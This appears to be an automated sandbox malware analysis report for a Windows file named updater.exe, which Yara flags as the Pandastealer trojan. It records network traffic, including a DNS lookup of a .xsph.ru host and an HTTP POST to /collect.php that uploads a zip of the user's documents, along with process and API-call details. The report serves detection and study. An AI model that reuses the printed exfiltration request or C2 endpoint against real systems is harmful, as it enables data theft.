Jul 4, 2023 11:12:03.309670925 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.309767962 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.309833050 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.309943914 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.310010910 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.310096979 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.310112000 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.310163975 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.310163975 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.310267925 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.310314894 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.310427904 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.310493946 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.310604095 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.310647011 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.310683012 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.310717106 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.310807943 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.310822010 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.310857058 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.310879946 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.310976982 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.311043024 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.311168909 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.311269999 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.311294079 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.311373949 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.311541080 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.311554909 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.311616898 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.311660051 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.311738968 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.311810970 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.311825991 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.311902046 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.311953068 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.312020063 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.312172890 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.312187910 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.312258959 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.312354088 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.312429905 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.312515020 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.312582970 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.312671900 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.312737942 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.312876940 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.312966108 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.312978029 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.313020945 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.313055038 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.313095093 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.313150883 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.313211918 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.313318968 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.313333988 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.313425064 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.313502073 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.313515902 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.313591003 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.313697100 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.313770056 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.313816071 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.313894987 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.313895941 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.313987017 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.314027071 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.314174891 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.314189911 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.314357042 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.314521074 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.314687967 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.380580902 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.380693913 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.380811930 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.381047010 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.381069899 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.391207933 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.391251087 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.391458988 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.391474009 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.391669989 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.391819954 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.391921043 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.396697044 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.396739960 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.396771908 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.396792889 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.396904945 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.397084951 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.397123098 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.397264004 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.397279024 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.397397995 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.397448063 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.397613049 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.397627115 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.397754908 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.397794008 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.397928953 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.397943974 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.398098946 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.398123980 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.398256063 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.398278952 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.398318052 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.398333073 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.398458958 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.398626089 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.398641109 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.398778915 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.398940086 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.398967981 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.399023056 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.399142027 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.399315119 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.399509907 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.399524927 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.399658918 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.399673939 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.399806023 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.399827957 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.399993896 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.400173903 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.400188923 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.400204897 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.400377989 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.400428057 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.400515079 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.400540113 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.400554895 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.400636911 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.400810957 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.400832891 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.401052952 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.401067972 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.401148081 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.401367903 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.401381969 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.401397943 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.401498079 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.401513100 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.401659012 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.401859045 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.402015924 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.402245998 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.402261972 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.402276993 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.402355909 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.402371883 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.402537107 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.402717113 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.402754068 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.402869940 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.402894020 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.403033018 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.403204918 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.403220892 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.403363943 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.403575897 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.403743029 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.403758049 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.403878927 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.404074907 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.404090881 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.404227972 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.404398918 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.404413939 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.404603958 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.404742002 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.404866934 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.404912949 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.405075073 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.405301094 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.405317068 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.405421019 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.405596018 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.405611038 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.405786991 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.405802011 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.405942917 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.406130075 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.406155109 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.406286001 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.406308889 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.406487942 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.406512022 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.406652927 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:04.566170931 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:04.566397905 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:05.087629080 CEST	49183	80	192.168.2.22	141.8.192.151

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 4, 2023 11:12:02.199645996 CEST	50108	53	192.168.2.22	8.8.8.8
Jul 4, 2023 11:12:02.282475948 CEST	53	50108	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 4, 2023 11:12:02.199645996 CEST	192.168.2.22	8.8.8.8	0xcd88	Standard query (0)	f0837288.xsph.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 4, 2023 11:12:02.282475948 CEST	8.8.8.8	192.168.2.22	0xcd88	No error (0)	f0837288.xsph.ru		141.8.192.151	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

f0837288.xsph.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49183	141.8.192.151	80	C:\Users\user\Desktop\updater.exe

Timestamp	kBytes transferred	Direction	Data
Jul 4, 2023 11:12:02.390363932 CEST	0	OUT	POST /collect.php HTTP/1.1 Content-Type: multipart/form-data; boundary=SendFileZIPBoundary User-Agent: uploader Host: f0837288.xsph.ru Content-Length: 1661723 Connection: Keep-Alive Cache-Control: no-cache
Jul 4, 2023 11:12:02.390427113 CEST	0	OUT	Data Raw: 2d 2d 53 65 6e 64 46 69 6c 65 5a 49 50 42 6f 75 6e 64 61 72 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 54 6f 55 70 6c 6f 61 64 22 3b 20 66 69 6c 65 6e 61 Data Ascii: --SendFileZIPBoundaryContent-Disposition: form-data; name="fileToUpload"; filename="zipfile.zip"Content-Type: application/zip
Jul 4, 2023 11:12:02.392108917 CEST	2	OUT	Data Raw: 50 4b 03 04 14 00 02 00 08 00 84 59 e4 56 25 e1 0c 9c 82 02 00 00 02 04 00 00 1b 00 11 00 46 69 6c 65 73 2f 41 6c 62 75 73 2f 47 49 47 49 59 54 46 46 59 54 2e 64 6f 63 78 55 54 0d 00 07 82 fe a3 64 82 fe a3 64 82 fe a3 64 0d 93 d9 91 45 21 08 44 Data Ascii: PKYV%Files/user/GIGIYTFFYT.docxUTdddE!D%*bLDvx(hW8}9T+HUT%=}0&.B/SkPR4h!/)~w"]FA_`&v$RPOPFZEoT?1f?~p0:f
Jul 4, 2023 11:12:02.480583906 CEST	3	OUT	Data Raw: 02 9a be e3 65 2f d9 b8 cd d9 88 bc 69 fc ad a8 0b cc 76 5f 6c f6 02 c0 8d 4b 7d ce bf e7 23 94 7b 44 5f d1 a7 7c eb 52 1b 7c a4 9e 17 0d 9b 5f 28 e1 8b a3 66 a3 7d 89 f1 f8 b4 5b bb 6d 6e 97 9d fe 7a 62 c1 57 ec ab 49 95 5a 5b 96 8f 72 56 83 f2 Data Ascii: e/iv_lK}#{D_\|R\|_(f}[mnzbWIZ[rV"u>'N+>Y]6=WMeLRhg0rirKE}XPPKYV%Files/user/(2) GIGIYTFFYT.docxUTdddE!D%*
Jul 4, 2023 11:12:02.481717110 CEST	6	OUT	Data Raw: 0a 5f d5 92 0e 94 53 3e c7 2f 8a 66 62 24 74 33 3c 53 70 68 45 6d d6 29 29 b5 6e 5e a4 d6 77 12 0a 54 f9 9c a3 8e ce b0 c2 a1 c8 e4 0d c1 55 f1 10 87 38 1f ab 9d 9c 90 03 a8 e4 5c ec dc cb de 49 c4 c2 b7 6d 08 60 f7 e4 4c df d3 a2 2d 5f 75 82 ef Data Ascii: _S>/fb$t3<SphEm))n^wTU8\Im`L-_u$.lOf}l\7e2E<=8_{<Zz{`baD4.>5#j}i?KYO"Q^orLav}xXKVk0n{PSj
Jul 4, 2023 11:12:02.570636034 CEST	8	OUT	Data Raw: ca b7 d8 92 c0 60 7e fc 52 c2 40 aa f9 1e 9b f1 b3 4d 7c 95 11 e6 98 56 f8 38 5d ec 88 69 79 f2 e1 94 19 1d 46 d5 cf 7c 13 28 23 9d 76 b2 fa 6e 2a d4 2c 2c 55 f6 8c f7 1d ab a3 de c7 4e 6d fc be 39 5a b3 c2 6c 8a 23 5b 2e 6b bf 36 5a 5b b7 ac 61 Data Ascii: `~R@M\|V8]iyF\|(#vn*,,UNm9Zl#[.k6Z[aQ^vF%?})fq2mN('AGc(X pmiQeeyKIo\|,%vnaI(x}UkQLh=v2l^oYwwG
Jul 4, 2023 11:12:02.571310997 CEST	11	OUT	Data Raw: 7c 9b 6e ce f4 e6 ae 2f 22 8f 4e f2 6e f8 09 9f 2e ca 52 69 9f dd 5d 95 62 48 32 8b 8d b5 87 2e 4f 27 af b5 d3 d7 c6 b9 c2 e5 e3 c4 38 6a b9 aa 18 ba 7f b9 5d fa 7f ef 66 cc 18 f3 2c 46 9d bd 30 ce ad 30 26 3b 10 32 05 b6 b8 75 ce 0d f1 bd 1d be Data Ascii: \|n/"Nn.Ri]bH2.O'8j]f,F00&;2ush]1w\fBmG13e5\|+aK'cN?xI(i5]\6oo<?PKYV? Files/user/(11) TQDF
Jul 4, 2023 11:12:02.571310997 CEST	14	OUT	Data Raw: 56 67 d3 a3 4a ec 54 34 86 91 c7 e4 3a bd d7 f2 33 02 3b 89 24 d9 85 36 b6 99 47 b4 93 62 ed b5 1c 9b 23 2f 08 f5 3a 8b a7 e7 a4 7d 55 b5 c4 24 f9 d5 b6 c3 ed d4 bf 3b fa 64 a6 77 41 9b 53 75 8c be 7b 1a a8 b3 48 7f 8f de 78 be 40 e4 57 8a 69 2e Data Ascii: VgJT4:3;$6Gb#/:}U$;dwASu{Hx@Wi.}?fFZ8OUcm4UU?W{C(ogaZErnEg+I;,y'(Re#SCai;5"qFoEQ2OE-}djm=OBt/to)};,m-`
Jul 4, 2023 11:12:02.660753012 CEST	19	OUT	Data Raw: d8 56 0f 1b 65 f4 dd 2d 27 14 79 27 45 4b 0f e8 7e eb 9f 9d fc 18 e4 0b b3 69 f8 3e 7e 0a 1c ff 62 bb 56 7c b0 d4 1c c7 1c 1b c7 db ba 01 e3 ef 5a 84 d2 f0 ce 4b 8b 3e 72 1d f6 28 89 51 61 d3 72 5b b9 3f bc 77 4c 99 44 98 67 c5 ca f0 5f 91 91 26 Data Ascii: Ve-'y'EK~i>~bV\|ZK>r(Qar[?wLDg_&832"gUC%)g`J(J ZO=ev=7nNNlta<$x65VEXC2<bJANqMa"K\|^`b\|
Jul 4, 2023 11:12:02.660852909 CEST	21	OUT	Data Raw: 4e 61 4b 1a 77 ba 36 a3 af 97 98 4e 28 db 20 a7 1f 90 09 6e 88 87 20 d9 cd ff d0 d9 01 32 56 20 9c 9e 38 50 6f ef b5 1d 57 29 1f e2 42 16 f8 2d 44 41 ec 51 eb 3a 43 12 92 ba 85 41 1c e8 25 b0 ec 38 79 03 8e 73 10 bd c6 7f d4 71 4c 2f 37 2a d3 14 Data Ascii: NaKw6N( n 2V 8PoW)B-DAQ:CA%8ysqL/7*`zhORt!@\|0&6e~Pf~j#S^^[5;P!gF"FK5q[!A5Q#M9&$6w(Xa$sR%P;?1'0M]=Xw/
Jul 4, 2023 11:12:02.661106110 CEST	24	OUT	Data Raw: ea 9d 3a 38 2e 33 f9 84 72 6c ef bd 12 02 ec e7 71 a7 ab c6 e3 d1 49 6b 6a 3f 42 68 a7 4e c4 35 7c 79 dc 9c 31 e3 ad c4 7a a7 9c 87 a3 0c 87 c3 45 3a 72 52 d0 0f cb 27 a6 69 5f 7c ef fd 2f c8 92 b6 5f 22 d9 fd ec 4b 8c e3 4c ef 48 1f 38 ae cd 56 Data Ascii: :8.3rlqIkj?BhN5\|y1zE:rR'i_\|/_"KLH8VgI#q MpqlsY4]B-_\8[D,MOx<m-_m^QE~"-s(KwZIy,~W\i'NpF}-s)%_W8dnSK)
Jul 4, 2023 11:12:04.566170931 CEST	1648	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 04 Jul 2023 09:12:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Target ID:	1
Start time:	11:12:02
Start date:	04/07/2023
Path:	C:\Users\user\Desktop\updater.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\updater.exe
Imagebase:	0x13c0000
File size:	698'280 bytes
MD5 hash:	5B7111AE32C04C641C56E81A6293EC48
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Pandastealer_8b333e76, Description: unknown, Source: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Trojan_Pandastealer_8b333e76, Description: unknown, Source: 00000001.00000000.996893045.0000000001447000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Execution Graph

Execution Coverage:	10.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	79

Executed Functions

Function 013C3507 Relevance: 49.4, APIs: 23, Strings: 5, Instructions: 360
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(014652C4), ref: 013C3591
GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013C35BB
LoadLibraryA.KERNEL32(01465268), ref: 013C3644
GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013C365E
GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013C367D
GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013C369C
LoadLibraryA.KERNEL32(0146508C), ref: 013C3737
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C376D
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C3787
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C37A1
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C37C5
LoadLibraryA.KERNEL32(01464D40), ref: 013C3867
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C389D
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C38B7
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C38D1
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C38F5
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C390F
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C3929
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C37E9

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013C36B1

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

LoadLibraryA.KERNEL32(0146543C), ref: 013C39A7
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C39CF
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C39E9

Strings

., xrefs: 013C35DE
B., xrefs: 013C3803
LM\W^Z, xrefs: 013C3603
., xrefs: 013C394A
JBB., xrefs: 013C352D

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$CriticalSection$EnterLeave$ConditionVariableWake
String ID: .$.$B.$JBB.$LM\W^Z
API String ID: 750888802-2939352088
Opcode ID: 52971c383eb820f421be35625cf8980d64a2197894de7d46863f481200fd8dc3
Instruction ID: 6201b0f382b88ff6d67866eec4ea879b082492a8278c48bb7e8a582d89734b7e
